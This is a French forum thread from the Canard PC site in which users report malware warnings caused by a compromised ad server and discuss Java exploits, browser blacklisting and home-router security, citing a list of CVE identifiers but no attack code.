> Et si c'est planqué, comment est-ce détectable (hormis par Norton and co) ? Certains processus ? Utiliser un petit programme fait pour l'occasion ?


Je relaie la demande. Ce serait sympa que CPC fasse un point là-dessus pour clore de problème.

----------


## ack

> (EDIT : avant toutes choses merci pour vos remarques !)
> Et donc si on est infecté, est-ce que ça peut être "dormant" ou on le sait forcément ?
> Et si c'est planqué, comment est-ce détectable (hormis par Norton and co) ? Certains processus ? Utiliser un petit programme fait pour l'occasion ?


Ca peut etre dormant, oui. Pour la détection, ça dépend de la qualité du malware, un truc bien fait sera indétectable, sinon les live-cd des éditeurs d'antivirus peuvent le faire. 

Mais il faut se dire que c'est beaucoup plus facile de prévenir que de guérir. Une fois infecté, le mieux c'est de tout balancer et réinstaller ton OS après avoir formaté tout ton disque.

----------


## Aerial

> En voila un parmi d'autres


C'est assez scandaleux on va dire.... La grande majorité des menaces informatique arrive par Internet, et la grande majorité des machines actuelles sont connectées 24/7 à ce même réseau, censé notamment leur fournir un moyen de mise à jour et de prévention contre lesdites attaques... Et les ténors du genre sont apparemment incapables de contrer de "simples" attaques, à l'heure où les géants de l'électronique nous sortent le dernier smartphone, la dernière tablette....... bref le dernier gadget. J'ai envie de gerber tout d'un coup...

Va falloir, avant d'arracher mon câble réseau de son socket pour l'éternité, que je me penche sur le moyen de ne plus utiliser le mode admin pour n'importe quoi...

"Y'a moyen de faire via Gestion des Comptes Utilisateurs", sous Windows 7 ?

----------


## ZeFeKa

C'est reparti mon kiki non ?

----------


## kamatchou

Oui ,j'ai eu nouvelle alerte kaspersky en allant sur le topic de crysis3  ::|: 

Edit: voila

----------


## ack

> Oui ,j'ai eu nouvelle alerte kaspersky en allant sur le topic de crysis3 
> 
> Edit: voila http://uppix.com/t-cpc51093de10011fd50.jpg


Tu voudrais bien copier/coller le lien qui s'affiche en bas ? Dans "Objet : ..."

edit : mon outil maison ne détecte pas de redirect suspect a l'heure actuelle (pas depuis la home ni ce topic en tout cas)

----------


## kamatchou

> Tu voudrais bien copier/coller le lien qui s'affiche en bas ? Dans "Objet : ..."


Impossible de faire "sélectionner et le copier  ,dsl .

----------


## Pigno

J'ai plus chrome qui bloque, par contre j'ai un message d'erreur dans la console avec la même adresse que plus haut et que hier aussi il me semble.

Si ça peut aider...

----------


## Doc TB

Je ne capte pas, j'ai tout parcouru en long en large et en travers et je ne vois rien du tout la. Tout semble clean.

Du coup on va virer purement et simplement le serveur de pub le temps d'y voir plus clair.

----------


## ack

Doc TB> Comme le site charge une iframe depuis widget.dlgamer.com , il suffit que dlgamer.com ait été répertorié comme dangereux par un éditeur (Kaspersky ou autre) et ça re-déclenche une alerte ..

(si c'est bien de dlgamer que le probleme d'hier est venu)

----------


## Doc TB

Bon la ca me saoule, je ne sais pas si c'est une réminiscence genre cache ou autre mais ce n'est pas tolérable. J'ai delete pub.canardpc.com et pub2.canardpc.com des DNS et du serveur. Deja on va utiliser un autre domaine pour éviter que tout le monde ne se fasse blacklisté. Aprés, il y a aussi Chrome qui est particuliérement saoulant. Hier il y a par exemple un probleme sur www.canardpc.com et forum.canardpc.com, mais il décréte que tout *.canardpc.com est vérolé, meme les URL qui n'ont strictement rien à voir (valid.canardpc.com par exemple) et pire encore, tous les sites qui contiennent un lien vers un sous-domaine du domaine vérolé. La ça devient ridicule. Hier on a bloqué 90% des sites hardwares mondiaux pour les utilisateurs de Chrome à cause des signatures CPUZ.

----------


## Testoide

Je viendrais plus que sur canardpc qu'avec mon iPad et puis c'est tout.  ::ninja:: 
Trop peur des virus.  ::ninja:: 

Du coup si on avait pas java d'installé on avait rien à craindre ? (Couplé à adblock et noscript)

----------


## Le Nihilanth

C'est une faille java qui est exploitée, donc non. Pas installé ou pas activé, même combat : no risk.

----------


## Frite

De mon côté c'est apparu vers 16h15, après une journée de flood participation sans problème. Je reviens à l'instant et ça a disparu.

----------


## Doc TB

> C'est une faille java qui est exploitée, donc non. Pas installé ou pas activé, même combat : no risk.


Faut aussi cliquer sur "j'installe" sur un popup d'installeur d'une applet JAVA qui pointe sur warezland...

---------- Post added at 17h40 ---------- Previous post was at 17h36 ----------

PS : J'ai reparcouru vos liens la (depuis 16h15) et je n'y vois rien de suspect en fait dans les URL. Il n'y a pas de mention du site à la con d'hier. Je ne capte pas. Sans compter que Kaspersky ne detecte pas un trojan mais une iframe...

---------- Post added at 17h43 ---------- Previous post was at 17h40 ----------




> De mon côté c'est apparu vers 16h15, après une journée de flood participation sans problème. Je reviens à l'instant et ça a disparu.



Oui mais tu as eu un popup pour downloader une merde ? Parcequ'il n'y a aucune trace d'un trojan ou autre. Peut etre que Chrome est parti en mode paranoid sur le nom de l'iframe

----------


## Yog-Sothoth

> Le probleme etait du à un *code malveillant collé à la pub DLGamer*. Tout est nettoyé la et il n'y a plus rien de craignos. Reste que Google met super longtemps à déblacklister et que ca fait chier.


Quelqu'un peut m'expliquer ?
C'est DLGamer qui a publié un truc infecté sans le savoir ? Ou bien ils ont mis leur pub et un ptit malin a rajouté le code malveillant (déjà ce terme ne me parle pas trop) après ?

Sinon j'ai plus de message je suis arrivé sur le site vers 17h30 et pas de souci.

----------


## gros_bidule

Pour ceux qui ont encore une alerte, vous avez essayé de lancer votre navigateur avec un nouveau profil ou une clean install ?
Je pense aux utilisateurs de Firefox : si ma mémoire est bonne, il y a une liste de sites blacklistés dans votre fichier urlclassifier3.sqlite (présent dans le dossier de votre profil Firefox). Il peut être utile de réinitialiser ce fichier (par ex. avec la version provenant d'une nouvelle install).
J'imagine qu'il y a un équivalent sous Chrome ?

----------


## deathdigger

Faut arrêter de croire que seul un compte admin peut être infecté :
Au taf, on a des wyse sur 7 embedded, le compte utilisateur est ultra restreint (ça va jusqu'à l'interdiction du click droit) et pourtant tu peux te chopper un virus type FBI.

----------


## Montigny

FBI = 

- Farce Bien Idiote
- Fion Bien Incurvé
- Fist Bien Introduit

J'arrive pas à me décider...

 :^_^:

----------


## ack

> C'est une faille java qui est exploitée, donc non. Pas installé ou pas activé, même combat : no risk.


Et plusieurs autres avec :



L'exploit Java se repère facilement puisqu'il demande d’exécuter un Applet, les autres s’exécutent sans que ça soit visible. Une liste (même pas complètement a jour) des exploits inclus dans Blackhole :


```
CVE-2012-4681 Oracle Java 7 Update 6, and possibly other versions, allows remote attackers to execute arbitrary code via a crafted applet, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class
CVE-2012-1889 Microsoft XML Core Services accesses uninitialized memory locations, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2012-1723 Java Runtime Environment (JRE), allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
CVE-2012-0507 Java Runtime Environment (JRE),  allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Concurrency.
CVE-2011-3544 Java Runtime Environment (JRE), allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
CVE-2011-2110 Adobe Flash Player allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2011-0611 Adobe Flash Player allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content.
CVE-2010-3552 New Java Plug-in, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
CVE-2010-0188 Adobe Reader, allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2010-1885   HCP
CVE-2010-1423   Java argument injection vulnerability in the URI handler in Java NPAPI plugin
CVE-2010-0886   Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-0842   Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0840   Java trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2009-1671   Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll
CVE-2009-0927   Adobe Reader Collab GetIcon
CVE-2008-2992   Adobe Reader util.printf
CVE-2007-5659   Adobe Reader CollectEmailInfo
CVE-2006-0003   IE MDAC
```

Et on applaudit bien fort Adobe et Oracle.




> Faut arrêter de croire que seul un compte admin peut être infecté :


Bien sur qu'on peut infecter un PC depuis un compte de simple user, mais dans la vraie vie les developpeurs de malware partent presque toujours de l'hypothese que la victime est admin de son poste et pour cause.. c'est le cas  ::P: 

---------- Post added at 19h53 ---------- Previous post was at 19h47 ----------




> PS : J'ai reparcouru vos liens la (depuis 16h15) et je n'y vois rien de suspect en fait dans les URL. Il n'y a pas de mention du site à la con d'hier. Je ne capte pas. Sans compter que Kaspersky ne detecte pas un trojan mais une iframe...


C'est le fait qu'une iframe fasse pointer sur dlgamer.com qui posait problème en fait, ce domaine ayant sans doute été classe comme suspect. Du coup, gaffe que ça soit pas pressenonstop.com qui se fasse alpaguer a son tour.

----------


## Vladtepes

> Hier il y a par exemple un probleme sur www.canardpc.com et forum.canardpc.com, mais il décréte que tout *.canardpc.com est vérolé, meme les URL qui n'ont strictement rien à voir (valid.canardpc.com par exemple) et pire encore, tous les sites qui contiennent un lien vers un sous-domaine du domaine vérolé. La ça devient ridicule.


Très clairement.
Il y a le même genre de soucis avec certains sites d'hébergement gratos.

----------


## Doc TB

> C'est le fait qu'une iframe fasse pointer sur dlgamer.com qui posait problème en fait, ce domaine ayant sans doute été classe comme suspect. Du coup, gaffe que ça soit pas pressenonstop.com qui se fasse alpaguer a son tour.


Justement, c'est fait pour ca. Que pressenonstop.com se fasse blacklister, rien à cirer, tant que ce n'est pas canardpc.com et sa myriade de sous-domaine...

---------- Post added at 20h01 ---------- Previous post was at 19h59 ----------




> Très clairement.
> Il y a le même genre de soucis avec certains sites d'hébergement gratos.


Globalement, ça me saoule que mon navigateur décide à ma place ce qui est "safe" et n'interdise de lire ce qu'il juge "non safe" à moins de "confirmer" 12x la chose. Un peu comme Vista et l'UAC ou il fallait tout confirmer à chaque clic. Le pire, c'est la vieille page pourrie de Firefox quand il y a une couille avec un certificat SSL expiré...

----------


## Nazedaq

Tiens la même, sur binnews. Même cause même conséquence, sans doute.

----------


## Frite

> Oui mais tu as eu un popup pour downloader une merde ? Parcequ'il n'y a aucune trace d'un trojan ou autre. Peut etre que Chrome est parti en mode paranoid sur le nom de l'iframe


Rien de spécial, non. Juste le gros warning en revenant sur mon tableau de bord, comme hier soir. Et comme je suis sur une machine au boulot (sur Safari 5.x) sans java ou rien, j'ai continué sans trop trembler du slip.

----------


## nero_angelo

Je ne comprends plus rien ( ça change a chaque fois que je reviens a la maison) , le problème a été régler et tous les risques sont écarté non ?



> Justement, c'est fait pour ca. Que pressenonstop.com se fasse blacklister, rien à cirer, tant que ce n'est pas canardpc.com et sa myriade de sous-domaine...
> 
> ---------- Post added at 20h01 ---------- Previous post was at 19h59 ----------
> 
> 
> 
> Globalement, ça me saoule que mon navigateur décide à ma place ce qui est "safe" et n'interdise de lire ce qu'il juge "non safe" à moins de "confirmer" 12x la chose. Un peu comme Vista et l'UAC ou il fallait tout confirmer à chaque clic. Le pire, c'est la vieille page pourrie de Firefox quand il y a une couille avec un certificat SSL expiré...


Perso je viens d'essayer sur Chrome et ça ne bloque pas .

----------


## b0b0

> Bon la ca me saoule, je ne sais pas si c'est une réminiscence genre cache ou autre mais ce n'est pas tolérable. J'ai delete pub.canardpc.com et pub2.canardpc.com des DNS et du serveur. Deja on va utiliser un autre domaine pour éviter que tout le monde ne se fasse blacklisté. Aprés, il y a aussi Chrome qui est particuliérement saoulant. Hier il y a par exemple un probleme sur www.canardpc.com et forum.canardpc.com, mais il décréte que tout *.canardpc.com est vérolé, meme les URL qui n'ont strictement rien à voir (valid.canardpc.com par exemple) et pire encore, tous les sites qui contiennent un lien vers un sous-domaine du domaine vérolé. La ça devient ridicule. Hier on a bloqué 90% des sites hardwares mondiaux pour les utilisateurs de Chrome à cause des signatures CPUZ.

----------


## abelthorne

> le problème a été régler et tous les risques sont écarté non ?


Pas celui du thread Mark of the Ninja, en tout cas.  ::siffle:: 

(Et qui est dû à une image vérolée ou je ne sais quoi.)

----------


## Molina

Hmm, si ça peut aider, ça fait quelques mois que tous les domaines cpc.cx, quelques soient le site donnée, me lancent sur une page chrome "attention danger" ou norton "site web malveillant". Bon, j'avoue, je perds de plus en plus de temps sur cpc mais quand même.

----------


## Monsieur Cacao

Pour info, on peut accéder au forum en passant par http://cpc.x86.fr et non canardpc.Com.
Pratique pour ceux qui sont bloqués par une connerie comme Fortinet.net  au boulot.

----------


## fofo

> La ça devient ridicule. Hier on a bloqué 90% des sites hardwares mondiaux pour les utilisateurs de Chrome à cause des signatures CPUZ.


Putain clair 63200 résultats dans google avec "valid.canardpc.com malware"

----------


## kenshironeo

Hop,peti scan rapide avec avast, juste au cas où.

----------


## Vladtepes

> Globalement, ça me saoule que mon navigateur décide à ma place ce qui est "safe" et n'interdise de lire ce qu'il juge "non safe" à moins de "confirmer" 12x la chose. Un peu comme Vista et l'UAC ou il fallait tout confirmer à chaque clic. Le pire, c'est la vieille page pourrie de Firefox quand il y a une couille avec un certificat SSL expiré...


Une belle mise en illustration (récupéré sur un post d'un forum HW Ricain en cherchant "valid.canardpc.com malware"):



> What is the current listing status for valid.canardpc.com?
> This site is not currently listed as suspicious.
> 
> What happened when Google visited this site?
> Of the 12 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-01-21, and suspicious content was never found on this site within the past 90 days.
> This site was hosted on 1 network(s) including AS29169 (GANDI).
> 
> Has this site acted as an intermediary resulting in further distribution of malware?
> Over the past 90 days, valid.canardpc.com did not appear to function as an intermediary for the infection of any sites.


Voilà, on a jamais scanné de contenu problématique, mais à coté de ça on le verrouille quand même et on verrouille de manière transitive toutes les pages contenant une adresse de ce domaine.
 ::o:

----------


## abelthorne

Sauf qu'il y avait apparemment du contenu problématique avec la régie de pub, vu que les antivirus s'affolaient chez tout le monde.

Et la page du thread Mark of the Ninja. Ouh ouh ? y a quelqu'un pour aller y jeter un coup d'œil ?

----------


## ack

> Voilà, on a jamais scanné de contenu problématique, mais à coté de ça on le verrouille quand même et on verrouille de manière transitive toutes les pages contenant une adresse de ce domaine.


Principe de précaution. Et ils ont raison, même si c'est indéniable que pour les gens de bonne foi ça peut poser de gros problèmes. 

Prend le nom de domaine sportop.c0m.li (celui qui essayait d'exploiter les failles des utilisateurs l'autre jour). Si tu regardes un peu, tu vois que des sous-domaines de c0m.li il y en a un paquet (j'en ai trouve une 20aine dans mes recherches), et tous servent évidemment a diffuser du malware. Si google bloquait le nom, et pas tout le domaine, il suffirait au propriétaire malhonnête de créer un alias ou même un nouveau sous-domaine (a1.c0m.li, a2.c0m.li, etc.), ça prend quelques secondes et tu peux l'automatiser très simplement.

----------


## Vladtepes

> Sauf qu'il y avait apparemment du contenu problématique avec la régie de pub, vu que les antivirus s'affolaient chez tout le monde.


Ouaip, mais il n'était pas sur le même sous-domaine.




> Si google bloquait le nom, et pas tout le domaine, il suffirait au propriétaire malhonnête de créer un alias ou même un nouveau sous-domaine (a1.c0m.li, a2.c0m.li, etc.), ça prend quelques secondes et tu peux l'automatiser très simplement.


Il y a moyen de raffiner. On peut supposer par exemple qu'au delà d'un certain nombre de sous-domaines infectés, on bannit tout le domaine.

Le principe de précaution, c'est juste un parapluie judiciaire. Un médicament comme l'aspirine ne passerai sans doutes jamais les tests de validation de nos jours.

----------


## Tylers

> (...)Ainsi j'institue une regle : au cas fort improbable ou ca devrait se reproduire, on offre 6 mois d'abo gratos aux 3 premiers qui m'envoyent un PM pour le signaler (avec quelques details techniques inside) et qui mettent en copie doctb at vous savez quoi .com.



C'est de l'incitation au piratage ca monsieur  ::o: .
En tout cas mon mail est préformaté et près a l'emploi au cas ou çà se reproduirait  ::P:

----------


## ack

> Il y a moyen de raffiner. On peut supposer par exemple qu'au delà d'un certain nombre de sous-domaines infectés, on bannit tout le domaine.


Sans entrer dans les détails techniques, ce n'est malheureusement pas réalisable comme ça. Et ce n'est pas un parapluie judiciaire, en aucun cas Google (ou un autre editeur) ne pourrait etre tenu responsable en cas d'infection d'utilisateurs suite a la visite d'un site. S'ils font ca c'est parce que c'est dans leur interet (image et economique) de presenter de meilleurs resultats.

----------


## Emerion

> Bon la ca me saoule, je ne sais pas si c'est une réminiscence genre cache ou autre mais ce n'est pas tolérable. J'ai delete pub.canardpc.com et pub2.canardpc.com des DNS et du serveur. Deja on va utiliser un autre domaine pour éviter que tout le monde ne se fasse blacklisté. Aprés, il y a aussi Chrome qui est particuliérement saoulant. Hier il y a par exemple un probleme sur www.canardpc.com et forum.canardpc.com, mais il décréte que tout *.canardpc.com est vérolé, meme les URL qui n'ont strictement rien à voir (valid.canardpc.com par exemple) et pire encore, tous les sites qui contiennent un lien vers un sous-domaine du domaine vérolé. La ça devient ridicule. Hier on a bloqué 90% des sites hardwares mondiaux pour les utilisateurs de Chrome à cause des signatures CPUZ.


Bon tout ca c'est bien, Doc TB, considere comme le maitre du monde du hardware, tu nous sors quand un navigateur, parceque pas foutu d'avoir ma dose de CpC en tchequie durant 2 jours, oblige de telecharger tout les antivirus online, afin d'etre sur que mon NOD32 avait pas peter.
Mais je confirme, Google commence a gaver, parceque l'alerte sur CpC sur Chrome et FF part de la. Je bosse pour une grosse boite ricaine, supportant une grosse boite francaise, et on a eut la meme grouille il y a quelque mois. Au niveau business, c'est ultra lourd... On a tellement raler a IE, mais au moins a par les alertes que tu suivais ou pas, M$ bloquait rien. La avec FF, Chrome et Google, tu peux paralyser la bourse si la derniere version java ne leur plait pas...
On va commencer a avoir des trucs tres sympa...

----------


## gros_bidule

C'est surtout la régie de pub qui gonfle, hein  :;): 
Elle a diffusé un malware : logique que les sites diffusant cette pub et donc le malware soient considérés comme dangereux.
Non mais je rêve là...

----------


## Tylers

Nan DocTB a expliqué que la faille venait de leur serveur, que çà a été collé a la pub mais que çà aurait pu être ailleurs sur la page.

----------


## Bah

J'ai à nouveau le message d'erreur de Chrome, cette fois sur ce topic : 
http://forum.canardpc.com/threads/73...olume-2/page83

----------


## Anonyme871

Pareil.

----------


## Jasoncarthes

itoo

----------


## Tomaka17

> Le pire, c'est la vieille page pourrie de Firefox quand il y a une couille avec un certificat SSL expiré...


Géniale cette page Firefox soit dit en passant.

En tant que propriétaire de site on pourrait penser que c'est pas une mauvaise idée de rajouter un petit certificat vite fait, histoire que les communications soient cryptées et que ce soit sécurisé.
Mais non. Les certificats sont double emploi : ils servent à la fois à crypter les communications et à prouver que le site est légit (que ce n'est pas du phishing). Et pour cette deuxième chose, il faut payer pour qu'un organisme certifié enregistre ton certificat.

Hé bien si tu veux juste un certificat pour crypter les communications mais que tu ne l'as pas enregistré, Firefox t'affichera un gros warning similaire à celui dont on parle sur ce topic.
C'est à dire que pour Firefox, si tu n'as aucune sécurité il n'y a pas de problème, mais si tu cryptes tes communications c'est dangereux pour l'utilisateur.

Dans la pratique ça coûte pas très cher, mais si les mecs sont longs à la détente pour te valider ton certif ou s'il expire, tu dis merci au gros message qui fait fuir tout le monde.

----------


## Kass Kroute

Puisqu'on en a suffisamment parlé ici, une màj importante de Java est sortie  :;):

----------


## Fitz

> Puisqu'on en a suffisamment parlé ici, une màj importante de Java est sortie


Merci  ::): 




> En voila un parmi d'autres 
> 
> Tu en trouveras plein d'autres sur google, dont certains plus a jour (celui au dessus date de 2010), mais celui-la est en français ce qui est assez rare.
> 
> 
> 
> Quand tu sais qu'aujourd'hui les auteurs de malware ne sont plus des hackers passionés dans leur garage, mais bien des hangars remplis de développeurs qualifiés dans les pays de l'Est, imagine le nombre de méthodes de contournement ils peuvent mettre au point ..


J'ai enfin trouvé le temps de lire ce document.
C'est édifiant, en effet.

Je vais finir par surfer uniquement dans des VM, moi...

----------


## Tomaka17

> J'ai enfin trouvé le temps de lire ce document.
> C'est édifiant, en effet.
> 
> Je vais finir par surfer uniquement dans des VM, moi...


Sinon tu fais comme moi (et comme beaucoup de monde) : tu n'utilises ni antivirus ni firewall (et tu actives ta cervelle pour ne pas ouvrir nana_a_poil.jpg.exe)

Ça doit faire une dizaine d'années que je fais ça, et n'ai jamais eu aucun problème.
Du coup je ne comprends pas les gens qui utilisent encore ce genre de logiciel bouffe-mémoire et bouffe-CPU.

----------


## Anton

Firewall Windows/FAI, quand même.

Mais oui, remplace ton antivirus chéri par ton cerveau et globalement ça marche mieux  :Cigare:

----------


## Tomaka17

> Firewall Windows/FAI, quand même.


Quel intérêt quand t'as une box ?
La box c'est le firewall ultime. À moins que tu bidouilles la configuration il est impossible d'avoir accès à ton PC depuis l'extérieur.

----------


## Anton

Vu que ça ne coûte rien, principe de précaution  :tired:

----------


## ack

> Quel intérêt quand t'as une box ?
> La box c'est le firewall ultime. À moins que tu bidouilles la configuration il est impossible d'avoir accès à ton PC depuis l'extérieur.


Pourquoi seulement depuis l’extérieur ? Un firewall ça te prévient aussi quand un programme non-autorise essaie de sortir. Typiquement un virus, malware, etc.

Et une box ça n'est pas un firewall ultime, il y a souvent des services qui tournent dessus (dont l'utilisateur n'a parfois pas connaissance), et qui peuvent contenir des vulnérabilités (voir upnp récemment).

----------


## Tomaka17

Si tu pars du principe que tu n'es pas infecté au départ, une box t'empêche de le devenir.
UPnP est considéré comme une mauvaise chose car cela facilite la vie des virus/vers/etc. qui ont infecté ta machine, mais de l'extérieur ça ne risque rien.

----------


## Fitz

> Sinon tu fais comme moi (et comme beaucoup de monde) : tu n'utilises ni antivirus ni firewall (et tu actives ta cervelle pour ne pas ouvrir nana_a_poil.jpg.exe)
> 
> Ça doit faire une dizaine d'années que je fais ça, et n'ai jamais eu aucun problème.
> Du coup je ne comprends pas les gens qui utilisent encore ce genre de logiciel bouffe-mémoire et bouffe-CPU.


Il y a longtemps que j'ai activé ma cervelle, et que je sais que le meilleur AV, c'est l'utilisateur.
Par contre je ne savais pas que les AV étaient si vulnérables. Mais ce n'est pas comme si je comptais énormément sur eux non plus. Comme dit plus haut, je n'attends pas grand chose d'avast, à part bloquer 2-3 trucs de temps en temps, c'est toujours ça de pris vu qu'il ne ralentit pas ma machine (enfin c'est imperceptible). Et pas de faux sentiment de sécurité non plus.

----------


## ack

> Si tu pars du principe que tu n'es pas infecté au départ, une box t'empêche de le devenir.


Nope. Une box n’empêche rien de tout ça, ça fait office de mauvais firewall, rien a voir avec une infection de malware/virus/rootkit/whatever, qui n'a besoin comme seule interaction pour infecter un utilisateur qu'il surfe sur un domaine contrôlé par l'attaquant. Les attaques par l’extérieur ça n'est plus qu'une minorité d'attaques, bien qu'il y a 10 ans c’était la norme. 




> UPnP est considéré comme une mauvaise chose car cela facilite la vie des virus/vers/etc. qui ont infecté ta machine, mais de l'extérieur ça ne risque rien.


Non plus. Upnp ne facilite rien si tu es déjà infecte, c'est un protocole réseau. Et oui, de l’extérieur tu risques, et c'est même le plus gros risque possible, un remote code exec sur ta box depuis internet, il n'y a pas plus simple pour un attaquant. 

Voir une des failles récentes : http://www.kb.cert.org/vuls/id/922681

A savoir que libupnp contient sans doute bien d'autres vulnérabilités, et qu'une box a généralement plusieurs services de ce type qui tournent par défaut. Si tu as des choses a protéger chez toi, utiliser ta box comme firewall c'est une hérésie.

----------


## Tomaka17

> rien a voir avec une infection de malware/virus/rootkit/whatever, qui n'a besoin comme seule interaction pour infecter un utilisateur qu'il surfe sur un domaine contrôlé par l'attaquant.


Et en quoi un "vrai" firewall empêcherait ton infection ?

Si tu mets pas à jour java/ton os/ton browser, tu te fais infecter, même avec 15 firewalls et 8 ponts.





> Non plus. Upnp ne facilite rien si tu es déjà infecte, c'est un protocole réseau. Et oui, de l’extérieur tu risques, et c'est même le plus gros risque possible, un remote code exec sur ta box depuis internet, il n'y a pas plus simple pour un attaquant. 
> 
> Voir une des failles récentes : http://www.kb.cert.org/vuls/id/922681
> 
> A savoir que libupnp contient sans doute bien d'autres vulnérabilités, et qu'une box a généralement plusieurs services de ce type qui tournent par défaut. Si tu as des choses a protéger chez toi, utiliser ta box comme firewall c'est une hérésie.


S'il y a des failles dans libupnp, les mises à jour sont faites pour ça.
C'est pas très différent d'un browser pas à jour, d'un o/s pas à jour ou d'un firewall software qui aurait une faille de sécurité.
Quand t'étais derrière un simple modem et que des mecs trouvaient des failles de sécurité pour contourner McAfee et ZoneAlarm, c'était pas mieux.

Certes les mecs qui déclenchent ces mises à jour sont il me semble plutôt mous du genou, mais si l'on s'en tient au principe qu'un software n'est pas censé contenir de faille, il n'y a rien à redire d'une box niveau sécurité.

Et non je n'ai rien à protéger chez moi, tout comme 99 % des gens ici. Si tu as des documents importants de ton entreprise sur ton PC perso, c'est plutôt ton service informatique qu'il faut blâmer pour ne pas avoir interdit ça.
Je dis juste que pour un particulier tu peux sans problème économiser les 100 boules que tu aurais claqué pour acheter un antivirus ou un firewall.

----------


## ack

> Et en quoi un "vrai" firewall empêcherait ton infection ?
> 
> Si tu mets pas à jour java/ton os/ton browser, tu te fais infecter, même avec 15 firewalls et 8 ponts.


Ah mais en rien, c'est justement ce que je disais, ni ta box ni ton firewall ne previendront une infection. La seule différence, c'est que ton firewall poste de travail détectera peut-être une tentative de sortie d'un process bizarre, et te remontera une alerte. Pas ta box, qui d'ailleurs ne filtre que l'entrant par défaut sur la plupart des modèles. Donc si tu pars du principe que tu n'es pas infecté au départ, une box ne t’empêche pas de le devenir, ni un firewall poste de travail.





> S'il y a des failles dans libupnp, les mises à jour sont faites pour ça.
> C'est pas très différent d'un browser pas à jour, d'un o/s pas à jour ou d'un firewall software qui aurait une faille de sécurité.


Si c'est similaire en théorie, en pratique c'est très différent. Java est audité en permanence, Chrome aussi, Windows, Firefox etc. le sont aussi.

Libupnp ne l'est pas, tout comme les *millions* de libs/exécutables publiés sur internet. C'est de la que vient le danger. Les fabriquants de box par exemple implémentent des tas de services avec ces libs sans avoir audité quoi que ce soit. Et c'est d'autant plus dangereux lorsqu'il s'agit d’équipements accessibles depuis l’extérieur. 




> Certes les mecs qui déclenchent ces mises à jour sont il me semble plutôt mous du genou, mais si l'on s'en tient au principe qu'un software n'est pas censé contenir de faille, il n'y a rien à redire d'une box niveau sécurité.


Alors c'est l'inverse, on part du principe qu'un software contient des failles, jusqu’à preuve du contraire. La pratique le prouve encore chaque jour. Et vraiment, niveau sécurité, une box c'est une faille géante compare a un vrai firewall. Et les mecs ne sont pas "mous du genou", ils mettent carrément des années avant de patcher. Déjà ils ne connaissent l'existence de la faille que le jour ou elle est rendu publique (généralement des années après sa découverte et son exploitation par des hackers), et encore la il leur faut prendre conscience que c'est un vrai problème. On tape beaucoup sur les doigts de Java en ce moment (et c'est justifié), mais peu d’éditeurs font preuve de la réactivité de Oracle en matière de sécu. 




> Et non je n'ai rien à protéger chez moi, tout comme 99 % des gens ici. Si tu as des documents importants de ton entreprise sur ton PC perso, c'est plutôt ton service informatique qu'il faut blâmer pour ne pas avoir interdit ça. Je dis juste que pour un particulier tu peux sans problème économiser les 100 boules que tu aurais claqué pour acheter un antivirus ou un firewall.


Bien d'accord la-dessus, surtout que des AV et firewall gratuits ça ne manque pas.

----------


## jujupatate

Et le Hotdeal DLgamer du jour est NOD32 Antivirus  :^_^:

----------


## Paul Verveine

J'ai un avertissement ici  :  http://forum.canardpc.com/threads/72...page-1/page183

----------


## ack

> J'ai un avertissement ici  :  http://forum.canardpc.com/threads/72...page-1/page183


2 images sur le thread qui sont hébergées par un domaine détecté comme dangereux par Google Safe Browsing, www.lesrhabilleurs.com :

Hamilton_Jazzmaster_Face2face_1.jpg et Hamilton_Jazzmaster_Face2face_2.jpg

----------


## Bibeuf

Bonjour j'ai également un avertissement en allant sur le topic de discussion générale de LOL. Bon il faut dire que l'endroit est parfois sale mais tout de même...

"Danger : Attention, logiciel malveillant !
Google Chrome a bloqué l'accès à cette page sur forum.canardpc.com.
Du contenu a été inséré dans cette page web par www.canailleblog.com, un distributeur de logiciels malveillants connus. En consultant cette page, vous risquez d'infecter votre ordinateur avec des logiciels malveillants.
Les logiciels malveillants peuvent entraîner, entre autres, un vol d'identité, une perte financière et la suppression permanente de fichiers."

----------


## ack

Pour ceux que ça intéresse, vous pouvez scanner un site pour vérifier qu'il ne redirige pas sur des domaines suspects : http://cpc.cx/6GT

Ça scanne le site de manière dynamique (avec exécution de tous les scripts), et ça vérifie si les domaines sur lesquels il pointe sont catégorisés comme suspects / dangereux. En plus des redirections, ça analyse également de manière statique tous les scripts trouvés pour vérifier qu'ils ne font rien de dangereux. 


(disclaimer: c'est mon produit fait avec mes petites mains, je peux donc ne pas être tout a fait objectif sur ses innombrables qualités. Et oui, c'est gratuit).

----------


## DeadFish

Il y a une demi heure environ, j'ai eu une alerte d'Avast en allant sur la page du 275 ("Jambon de Baillon"). "Internet blabla" mais aucune trace dans le journal.

Juste pour dire.

EDIT : je confirme, j'ai la même alerte chaque fois que j'y retourne.

----------


## Aulren

De même sur la page suivante : http://forum.canardpc.com/threads/40...=1#post6657769

----------


## JazzMano

Ta chopé la kenshironitte, mes condoléances.

----------


## Jeckhyl

Kaspersky frétille, possiblement sur le topic des motards (pas sûr à 100%).



---------- Post added at 16h24 ---------- Previous post was at 15h58 ----------

Je confirme que l'alerte est donnée dès que je vais dans le fil des motards. Quand à savoir si ça vient d'un message ou d'une signure, je ne suis pas qualifié  ::): .

----------


## Bah

Avast panique chaque fois que je vais sur le topic des questions auxquelles on répondra si on veut.

Détails des infections
URL:	http://ompldr.org/vOGwydQ
processus:	C:\Program Files (x86)\Google\Chrome\App...
infection:	URL:Mal

----------


## poseidon8500

La même ici avec la première page du topic de la louse du jour

Détails des infections

URL:	http://ompldr.org/vZmVicA
processus:	C:\Program Files (x86)\Google\Chrome\App...
infection:	URL:Mal

Apparemment c'est tout le site ompldr qui est concerné.

----------


## Algent

